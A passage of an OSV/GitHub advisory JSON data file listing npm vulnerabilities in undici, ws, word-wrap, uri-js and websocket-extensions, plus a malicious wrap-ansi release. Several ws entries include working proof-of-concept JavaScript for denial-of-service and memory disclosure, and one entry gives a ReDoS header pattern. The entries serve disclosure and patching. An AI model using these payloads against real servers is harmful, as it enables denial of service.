\n\n### References\n\nhttps://hackerone.com/reports/1635514\nhttps://curl.se/docs/CVE-2018-1000007.html\nhttps://curl.se/docs/CVE-2022-27776.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n* To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-q768-x9m6-m9qp/GHSA-q768-x9m6-m9qp.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31151" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/issues/872" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/pull/1441" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/0a5bee9465e627be36bac88edf7d9bbc9626126d" }, { "type": "WEB", "url": "https://hackerone.com/reports/1635514" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.8.0" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220909-0006" } ], "database_specific": { "cwe_ids": [ "CWE-346", "CWE-601", "CWE-93" ], "github_reviewed": true, "github_reviewed_at": "2022-07-21T20:31:05Z", "nvd_published_at": "2022-07-21T04:15:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": 
"GHSA-r6ch-mqf9-qc9w", "published": "2023-02-16T20:46:10Z", "modified": "2023-11-08T04:11:48.635999Z", "aliases": [ "CVE-2023-24807" ], "related": [ "CVE-2023-24807" ], "summary": "Regular Expression Denial of Service in Headers", "details": "### Impact\nThe `Headers.set()` and `Headers.append()` methods are vulnerable to Regular Expression Denial of Service (ReDoS) attacks when untrusted values are passed into the functions. This is due to the inefficient regular expression used to normalize the values in the `headerValueNormalize()` utility function.\n\n### Patches\n\nThis vulnerability was patched in v5.19.1.\n\n### Workarounds\nThere is no workaround. Please update to an unaffected version.\n\n### References\n\n* https://hackerone.com/bugs?report_id=1784449\n\n### Credits\n\nCarter Snook reported this vulnerability.\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.19.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-r6ch-mqf9-qc9w/GHSA-r6ch-mqf9-qc9w.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-r6ch-mqf9-qc9w" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24807" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/f2324e549943f0b0937b09fb1c0c16cc7c93abdf" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.19.1" }, { "type": "WEB", "url": "https://hackerone.com/bugs?report_id=1784449" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2023-02-16T20:46:10Z", "nvd_published_at": "2023-02-16T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wqq4-5wpv-mx2g", "published": "2023-10-16T14:05:37Z", "modified": "2024-12-05T15:42:14.323907Z", "aliases": [ "CVE-2023-45143" ], "related": [ "CVE-2023-45143" ], "summary": "Undici's cookie header not cleared on cross-origin redirect in fetch", "details": "### Impact\n\nUndici clears Authorization headers on cross-origin redirects, but does not clear `Cookie` headers. By design, `cookie` headers are [forbidden request headers](https://fetch.spec.whatwg.org/#forbidden-request-header), disallowing them to be set in `RequestInit.headers` in browser environments. Since Undici handles headers more liberally than the specification, there was a disconnect from the assumptions the spec made, and Undici's implementation of fetch.\n\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in [e041de359221ebeae04c469e8aff4145764e6d76](https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76), which is included in version 5.26.2.\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.26.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-wqq4-5wpv-mx2g/GHSA-wqq4-5wpv-mx2g.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-wqq4-5wpv-mx2g" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45143" }, { "type": "WEB", "url": 
"https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76" }, { "type": "WEB", "url": "https://hackerone.com/reports/2166948" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.26.2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2023-10-16T14:05:37Z", "nvd_published_at": "2023-10-12T17:15:10Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-333w-rxj3-f55r", "published": "2018-07-24T20:00:30Z", "modified": "2024-04-22T19:37:18Z", "aliases": [ "CVE-2017-16021" ], "summary": "Regular Expression Denial Of Service in uri-js", "details": "Affected versions of `uri-js` is susceptible to a regular expression denial of service vulnerability when user input is sent to the `.parse()` method.\n\n\n\n## Recommendation\n\nUpdate to v3.0.0 or later.", "affected": [ { 
"package": { "name": "uri-js", "ecosystem": "npm", "purl": "pkg:npm/uri-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-333w-rxj3-f55r/GHSA-333w-rxj3-f55r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16021" }, { "type": "WEB", "url": "https://github.com/garycourt/uri-js/issues/12" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-333w-rxj3-f55r" }, { "type": "WEB", "url": "https://nodesecurity.io/advisories/100" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/100" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:53:45Z", "nvd_published_at": "2018-06-04T19:29:01Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g78m-2chm-r7qv", "published": "2020-06-05T16:16:12Z", "modified": "2025-01-14T08:57:32.136279Z", "aliases": [ "CVE-2020-7662" ], "related": [ "CVE-2020-7662" ], "summary": "Regular Expression Denial of Service in websocket-extensions (NPM package)", "details": "### Impact\n\nThe ReDoS flaw allows an attacker to exhaust the server's capacity to process\nincoming requests by sending a WebSocket handshake request containing a header\nof the following form:\n\n Sec-WebSocket-Extensions: a; b=\"\\c\\c\\c\\c\\c\\c\\c\\c\\c\\c ...\n\nThat is, a header containing an unclosed string parameter value whose content is\na repeating two-byte sequence of a backslash and some other character. The\nparser takes exponential time to reject this header as invalid, and this will\nblock the processing of any other work on the same thread. 
Thus if you are\nrunning a single-threaded server, such a request can render your service\ncompletely unavailable.\n\n### Patches\n\nUsers should upgrade to version 0.1.4.\n\n### Workarounds\n\nThere are no known work-arounds other than disabling any public-facing\nWebSocket functionality you are operating.\n\n### References\n\n- https://blog.jcoglan.com/2020/06/02/redos-vulnerability-in-websocket-extensions/", "affected": [ { "package": { "name": "websocket-extensions", "ecosystem": "npm", "purl": "pkg:npm/websocket-extensions" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.1.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-g78m-2chm-r7qv/GHSA-g78m-2chm-r7qv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/faye/websocket-extensions-node/security/advisories/GHSA-g78m-2chm-r7qv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7662" }, { "type": "WEB", "url": "https://github.com/faye/websocket-extensions-node/commit/29496f6838bfadfe5a2f85dff33ed0ba33873237" }, { "type": "WEB", "url": "https://blog.jcoglan.com/2020/06/02/redos-vulnerability-in-websocket-extensions" }, { "type": "PACKAGE", "url": "https://github.com/faye/websocket-extensions-node" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-WEBSOCKETEXTENSIONS-570623" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-03T23:10:26Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j8xg-fqg3-53r7", "published": "2023-06-22T06:30:18Z", "modified": "2025-02-13T19:00:43Z", "aliases": [ "CVE-2023-26115" ], "summary": "word-wrap vulnerable to Regular Expression Denial of Service", "details": "All versions of the package word-wrap are 
vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable.", "affected": [ { "package": { "name": "word-wrap", "ecosystem": "npm", "purl": "pkg:npm/word-wrap" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.2.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-j8xg-fqg3-53r7/GHSA-j8xg-fqg3-53r7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26115" }, { "type": "WEB", "url": "https://github.com/jonschlinkert/word-wrap/commit/420dce9a2412b21881202b73a3c34f0edc53cb2e" }, { "type": "PACKAGE", "url": "https://github.com/jonschlinkert/word-wrap" }, { "type": "WEB", "url": "https://github.com/jonschlinkert/word-wrap/blob/master/index.js#L39" }, { "type": "WEB", "url": "https://github.com/jonschlinkert/word-wrap/blob/master/index.js%23L39" }, { "type": "WEB", "url": "https://github.com/jonschlinkert/word-wrap/releases/tag/1.2.4" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-4058657" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-WORDWRAP-3149973" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2023-06-23T21:36:40Z", "nvd_published_at": "2023-06-22T05:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46983", "published": "2025-09-08T17:19:41Z", "modified": "2025-09-12T01:13:35Z", "aliases": [ "GHSA-2rv4-jp6r-xgq7" ], "summary": "Malicious code in wrap-ansi (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. 
Do not edit below this line.=-_\n\n## Source: ghsa-malware (9e58bb76dd73218635e5f6badd1c9693b827a8eb1be48d0bac75d6f8f85d4b53)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "wrap-ansi", "ecosystem": "npm", "purl": "pkg:npm/wrap-ansi" }, "versions": [ "9.0.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/wrap-ansi/MAL-2025-46983.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2rv4-jp6r-xgq7" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-2rv4-jp6r-xgq7", "import_time": "2025-09-09T00:35:48.401637602Z", "modified_time": "2025-09-08T18:21:37Z", "sha256": 
"9e58bb76dd73218635e5f6badd1c9693b827a8eb1be48d0bac75d6f8f85d4b53", "source": "ghsa-malware", "versions": [ "9.0.1" ] }, { "id": "GHSA-2rv4-jp6r-xgq7", "import_time": "2025-09-10T00:34:05.195235017Z", "modified_time": "2025-09-08T18:21:37Z", "sha256": "4c4bf3872e7828d6ef2152082e1c866e9eacc2f48bbbc739900e1606bed129bb", "source": "ghsa-malware", "versions": [ "9.0.1" ] }, { "id": "GHSA-2rv4-jp6r-xgq7", "import_time": "2025-09-11T00:34:35.442370858Z", "modified_time": "2025-09-10T17:56:24Z", "sha256": "4f48e2f6fc3cfff774a2698e39d7f9079bec18cdd5e1e8221e767925e889497b", "source": "ghsa-malware", "versions": [ "9.0.1" ] }, { "id": "GHSA-2rv4-jp6r-xgq7", "import_time": "2025-09-12T00:33:58.008935793Z", "modified_time": "2025-09-10T17:56:24Z", "sha256": "c05f3bc963e30ddf435d8a80250a8ace01d29fbfbf87ec2fe7d1d50e41d25f2b", "source": "ghsa-malware", "versions": [ "9.0.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2mhh-w6q8-5hxw", "published": "2019-02-18T23:56:42Z", "modified": "2023-11-08T03:58:10.113790Z", "aliases": [ "CVE-2016-10518" ], "summary": "Remote Memory Disclosure in ws", "details": "Versions of `ws` prior to 1.0.1 are affected by a remote memory disclosure vulnerability.\n\nIn certain rare circumstances, applications which allow users to control the arguments of a `client.ping()` call will cause `ws` to send the contents of an allocated but non-zero-filled buffer to the server. 
This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.\n\n\n\n## Proof of Concept\n```\nvar ws = require('ws')\n\nvar server = new ws.Server({ port: 9000 })\nvar client = new ws('ws://localhost:9000')\n\nclient.on('open', function () {\n console.log('open')\n client.ping(50) // this sends a non-zeroed buffer of 50 bytes\n\n client.on('pong', function (data) {\n console.log('got pong')\n console.log(data) // Data from the client. \n })\n})\n```\n\n\n## Recommendation\n\nUpdate to version 1.0.1 or greater.", "affected": [ { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-2mhh-w6q8-5hxw/GHSA-2mhh-w6q8-5hxw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10518" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/29293ed11b679e0366fa0f6bb9310b330dafd795" }, { "type": "WEB", "url": "https://gist.github.com/c0nrad/e92005446c480707a74a" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2mhh-w6q8-5hxw" }, { "type": "WEB", "url": "https://github.com/websockets/ws/releases/tag/1.0.1" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/67" } ], "database_specific": { "cwe_ids": [ "CWE-201" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:52:34Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-3h5v-q93c-6h6q", "published": "2024-06-17T19:09:10Z", "modified": "2024-07-15T22:12:28.401556Z", "aliases": [ "CVE-2024-37890" ], "related": [ "CGA-4mjj-vhp5-59v2", "CGA-5jj7-2gq6-8p9g", "CGA-6rmc-53qg-r2v4", "CGA-cm39-xg6p-r3wr", "CGA-h8rj-78mh-45v7", "CGA-hf88-h9xp-mq5f", "CGA-qv4g-5p29-rxvx", "CGA-r6qh-9mxv-rrj2", "CVE-2024-37890" 
], "summary": "ws affected by a DoS when handling a request with many HTTP headers", "details": "### Impact\n\nA request with a number of headers exceeding the[`server.maxHeadersCount`][] threshold could be used to crash a ws server.\n\n### Proof of concept\n\n```js\nconst http = require('http');\nconst WebSocket = require('ws');\n\nconst wss = new WebSocket.Server({ port: 0 }, function () {\n const chars = \"!#$%\u0026'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~\".split('');\n const headers = {};\n let count = 0;\n\n for (let i = 0; i \u003c chars.length; i++) {\n if (count === 2000) break;\n\n for (let j = 0; j \u003c chars.length; j++) {\n const key = chars[i] + chars[j];\n headers[key] = 'x';\n\n if (++count === 2000) break;\n }\n }\n\n headers.Connection = 'Upgrade';\n headers.Upgrade = 'websocket';\n headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';\n headers['Sec-WebSocket-Version'] = '13';\n\n const request = http.request({\n headers: headers,\n host: '127.0.0.1',\n port: wss.address().port\n });\n\n request.end();\n});\n```\n\n### Patches\n\nThe vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)\n\n### Workarounds\n\nIn vulnerable versions of ws, the issue can be mitigated in the following ways:\n\n1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][] and/or the [`maxHeaderSize`][] options so that no more headers than the `server.maxHeadersCount` limit can be sent.\n2. 
Set `server.maxHeadersCount` to `0` so that no limit is applied.\n\n### Credits\n\nThe vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in https://github.com/websockets/ws/issues/2230.\n\n### References\n\n- https://github.com/websockets/ws/issues/2230\n- https://github.com/websockets/ws/pull/2231\n\n[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize\n[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener\n[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount\n", "affected": [ { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.1.0" }, { "fixed": "5.2.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-3h5v-q93c-6h6q/GHSA-3h5v-q93c-6h6q.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-3h5v-q93c-6h6q/GHSA-3h5v-q93c-6h6q.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.5.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-3h5v-q93c-6h6q/GHSA-3h5v-q93c-6h6q.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.17.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-3h5v-q93c-6h6q/GHSA-3h5v-q93c-6h6q.json" } 
} ], "references": [ { "type": "WEB", "url": "https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q" }, { "type": "WEB", "url": "https://github.com/websockets/ws/issues/2230" }, { "type": "WEB", "url": "https://github.com/websockets/ws/pull/2231" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63" }, { "type": "PACKAGE", "url": "https://github.com/websockets/ws" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "github_reviewed_at": "2024-06-17T19:09:10Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5v72-xg48-5rpm", "published": "2019-06-04T19:37:52Z", "modified": "2021-08-04T21:29:05Z", "summary": "Denial of Service in ws", "details": "Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.\n\n## Proof of concept\n\n```\nconst WebSocket = require('ws');\nconst net = require('net');\n\nconst wss = new WebSocket.Server({ port: 3000 }, function () {\n const payload = 'constructor'; // or ',;constructor'\n\n const request = [\n 'GET / HTTP/1.1',\n 'Connection: Upgrade',\n 'Sec-WebSocket-Key: test',\n 'Sec-WebSocket-Version: 8',\n `Sec-WebSocket-Extensions: ${payload}`,\n 'Upgrade: websocket',\n '\\r\\n'\n ].join('\\r\\n');\n\n const socket = net.connect(3000, function () {\n 
socket.resume();\n socket.write(request);\n });\n});\n```\n\n\n## Recommendation\n\nUpdate to version 3.3.1 or later.", "affected": [ { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.6" }, { "fixed": "1.1.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-5v72-xg48-5rpm/GHSA-5v72-xg48-5rpm.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "3.3.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-5v72-xg48-5rpm/GHSA-5v72-xg48-5rpm.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:ws:20171108" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/550" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/550/versions" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-04T19:37:42Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6663-c963-2gqg", "published": "2019-02-18T23:58:35Z", "modified": "2023-11-08T03:58:11.580073Z", "aliases": [ "CVE-2016-10542" ], "summary": "DoS due to excessively large websocket message in ws", "details": "Affected versions of `ws` do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large 
payload.\n\n\n\n## Recommendation\n\nUpdate to version 1.1.1 or later. \nAlternatively, set the `maxpayload` option for the `ws` server to a value smaller than 256MB.", "affected": [ { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-6663-c963-2gqg/GHSA-6663-c963-2gqg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10542" }, { "type": "WEB", "url": "https://github.com/nodejs/node/issues/7388" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-6663-c963-2gqg" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/120" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:18:11Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-6fc8-4gx4-v693", "published": "2021-05-28T19:19:03Z", "modified": "2023-11-08T04:05:55.363871Z", "aliases": [ "CVE-2021-32640" ], "related": [ "CVE-2021-32640" ], "summary": "ReDoS in Sec-Websocket-Protocol header", "details": "### Impact\n\nA specially crafted value of the `Sec-Websocket-Protocol` header can be used to significantly slow down a ws server.\n\n### Proof of concept\n\n```js\nfor (const length of [1000, 2000, 4000, 8000, 16000, 32000]) {\n const value = 'b' + ' '.repeat(length) + 'x';\n const start = process.hrtime.bigint();\n\n value.trim().split(/ *, */);\n\n const end = process.hrtime.bigint();\n\n console.log('length = %d, time = %f ns', length, end - start);\n}\n```\n\n### Patches\n\nThe vulnerability was fixed in ws@7.4.6 (https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff) and backported to ws@6.2.2 
(https://github.com/websockets/ws/commit/78c676d2a1acefbc05292e9f7ea0a9457704bf1b) and ws@5.2.3 (https://github.com/websockets/ws/commit/76d47c1479002022a3e4357b3c9f0e23a68d4cd2).\n\n### Workarounds\n\nIn vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers using the [`--max-http-header-size=size`](https://nodejs.org/api/cli.html#cli_max_http_header_size_size) and/or the [`maxHeaderSize`](https://nodejs.org/api/http.html#http_http_createserver_options_requestlistener) options.\n\n### Credits\n\nThe vulnerability was responsibly disclosed along with a fix in private by [Robert McLaughlin](https://github.com/robmcl4) from University of California, Santa Barbara.\n", "affected": [ { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.4.6" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-6fc8-4gx4-v693/GHSA-6fc8-4gx4-v693.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": 